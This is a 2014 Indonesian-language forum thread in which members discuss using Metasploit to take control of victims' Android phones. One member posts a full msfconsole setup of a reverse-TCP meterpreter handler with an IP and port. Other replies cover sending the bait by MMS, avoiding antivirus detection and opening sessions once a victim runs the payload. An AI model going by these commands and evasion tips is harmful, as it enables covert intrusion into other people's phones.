03-27-2014, 01:26 PM
mantaf ne sharenya
izin praktek ya om!

03-27-2014, 01:26 PM
mantaf ne sharenya
![]()
03-27-2014, 04:52 PM
(03-27-2014, 01:26 PM)crash ahan Wrote: mantaf ne sharenya siap, silahkan om :-bd
Information Is The Most Dangerous Weapon In The World
04-14-2014, 01:13 PM
(01-15-2014, 10:30 AM)sonyrimawan Wrote: @Abdul Khaliq thanks om. semoga bermanfaat wahhh...mantap y om..:-bd berati bsa mengontrol alur keluar masuk juga y om..? klo umpan di lepas lewat mms gmana om ? jd target lebih spesifik gtu... ![]()
04-16-2014, 04:12 PM
om, ane nanya dikit. klo hp android yg kita exploit belum di root apakah kita tetap bisa mengakses hp korban? soalnya kebanyakan untuk pemegang hp android pemula systemnya msh belum di root yg artinya punya keterbatasan hak akses, sedangkan di perintah meterpreter syntaxnya hampir ke system semua. mungkin om bs jelasin ke ane sedikit
![]()
04-17-2014, 11:04 AM
(04-16-2014, 04:12 PM)kyoshiro67 Wrote: om, ane nanya dikit. klo hp android yg kita exploit belum di root apakah kita tetap bisa mengakses hp korban? soalnya kebanyakan untuk pemegang hp android pemula systemnya msh belum di root yg artinya punya keterbatasan hak akses, sedangkan di perintah meterpreter syntaxnya hampir ke system semua. mungkin om bs jelasin ke ane sedikit bisa kok om meskipun belum di root sama si korban kmren tested di tab temen
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret
visit: http://warungiso.blogspot.com/ I was not smart or special but I was unix
04-18-2014, 05:09 AM
(04-14-2014, 01:13 PM)checkpoint Wrote:(01-15-2014, 10:30 AM)sonyrimawan Wrote: @Abdul Khaliq thanks om. semoga bermanfaat wwew maksudnya di lepas lewat mms gimana om ane kurang paham ama pertanyaannya ![]() ![]() (04-17-2014, 11:04 AM)wine trochanter Wrote:(04-16-2014, 04:12 PM)kyoshiro67 Wrote: om, ane nanya dikit. klo hp android yg kita exploit belum di root apakah kita tetap bisa mengakses hp korban? soalnya kebanyakan untuk pemegang hp android pemula systemnya msh belum di root yg artinya punya keterbatasan hak akses, sedangkan di perintah meterpreter syntaxnya hampir ke system semua. mungkin om bs jelasin ke ane sedikit yups bener sekali kata om wine, android yang udah di root pun tetap bisa di kena exploit. \m/
Information Is The Most Dangerous Weapon In The World
04-19-2014, 02:00 AM
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp payload => android/meterpreter/reverse_tcp msf exploit(handler) > set lhost 95.128.181.59 lhost => 95.128.181.59 msf exploit(handler) > set lport 123 lport => 123 msf exploit(handler) > exploit [-] Handler failed to bind to 95.xxx.xxx.xx:123 [*] Started reverse handler on 0.0.0.0:123 [*] Starting the payload handler... Kalo failed gitu gimana om ? ![]() mohon pencerahannya ![]()
04-19-2014, 06:28 PM
(04-19-2014, 02:00 AM)eMJe009 Wrote: msf > use exploit/multi/handler failednya notifikasinya bagaimana? coba ketahui dulu apakah korban menggunakan antivirus di androidnya. soalnya itu payload masih telanjang belum di enkripsi jadi di antivirus masih ketahuan.
Information Is The Most Dangerous Weapon In The World
04-19-2014, 07:14 PM
(04-19-2014, 06:28 PM)sonyrimawan Wrote:(04-19-2014, 02:00 AM)eMJe009 Wrote: msf > use exploit/multi/handler failed pas jalanin exploitnya ![]() [-] Handler failed to bind to 95.xxx.xxx.xx:123
Udah gini aja :v
04-19-2014, 10:58 PM
(04-19-2014, 07:14 PM)eMJe009 Wrote:(04-19-2014, 06:28 PM)sonyrimawan Wrote:(04-19-2014, 02:00 AM)eMJe009 Wrote: msf > use exploit/multi/handler emang gtu kok kalo ane om, tp klo udh di eksekusi sama korban langsung kebuka sesi meterpreter nya ![]()
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret
visit: http://warungiso.blogspot.com/ I was not smart or special but I was unix |